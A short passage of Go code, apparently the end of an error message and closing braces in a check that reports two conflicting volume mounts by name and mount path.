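			pair[1].Name, pair[1].MountPath, pair[0].Name, pair[0].MountPath)
	}
}
```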